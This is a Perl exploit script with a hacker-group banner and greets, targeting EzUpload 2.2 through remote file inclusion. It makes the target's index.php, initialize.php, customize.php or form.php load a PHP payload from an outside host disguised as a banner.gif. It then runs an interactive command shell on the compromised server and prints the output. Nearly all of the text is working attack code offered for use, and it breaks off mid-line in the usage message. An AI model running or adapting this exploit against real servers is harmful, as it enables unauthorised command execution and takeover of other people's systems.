#!/usr/bin/perl #__________ #\______ \ ____ __| _/ \______ \____________ ____ ____ ____ # | _// __ \ / __ | | | \_ __ \__ \ / ___\ / _ \ / \ # | | \ ___// /_/ | | ` \ | \// __ \_/ /_/ <_) | \ # |____|_ /\___ >____ | /_______ /__| (____ /\___ / \____/|___| / # \/ \/ \/ \/ \//_____/ \/ # Bug Discovered By Johnnie Walker # credits to ATmaCa.....oh no I forgot I ain't kozan so atmaca no credits to u # Greets: sirh0t , Elisabeth And Her Bf Mattias # f0rtcu We Never f0rget You use IO::Socket; if ($ARGV[0] && $ARGV[1]) { $host = $ARGV[0]; $path = $ARGV[1]; $target = $ARGV[2]; $sock = IO::Socket::INET->new( Proto ="tcp", PeerAddr = "$host", PeerPort ="80") || die "Can't connect!\r\n"; while (1) { print 'RedDrag0n@'.$host.'$ '; $cmd = ; if ($target == 2) { $file = "initialize.php?path=http://sinanreklam.net/banner.gif?cmd=" } elsif ($target == 3) { $file = "customize.php?path=http://sinanreklam.net/banner.gif?cmd=" } elsif ($target == 4) { $file = "form.php?path=http://sinanreklam.net/banner.gif?cmd=" } else { $file = "index.php?path=http://sinanreklam.net/banner.gif?cmd=" } chop($cmd); last if ($cmd eq 'exit'); print $sock "GET ".$path.$file.$cmd." HTTP/1.1\r\nHost: ".$host."\r\nConnection: Keep-Alive\r\n\r\n"; $vuln=0; while ($ans = <$sock>) { if ($vuln == 1) { print "$ans"; } last if ($ans =~ /^_end_/); if ($ans =~ /^_begin_/) { $vuln = 1; } } if ($vuln == 0) {print "Exploit Failed :(\r\n";exit();} } } else { print "EzUpload 2.2 Remote Command Execution\r\n\r\n"; print "Target files : \r\n\r\n"; print "1 index.php (default)\r\n"; print "2 initialize.php\r\n"; print "3 customize.php\r\n"; print "4 form.php\r\n\r\n"; print "Usage: perl $0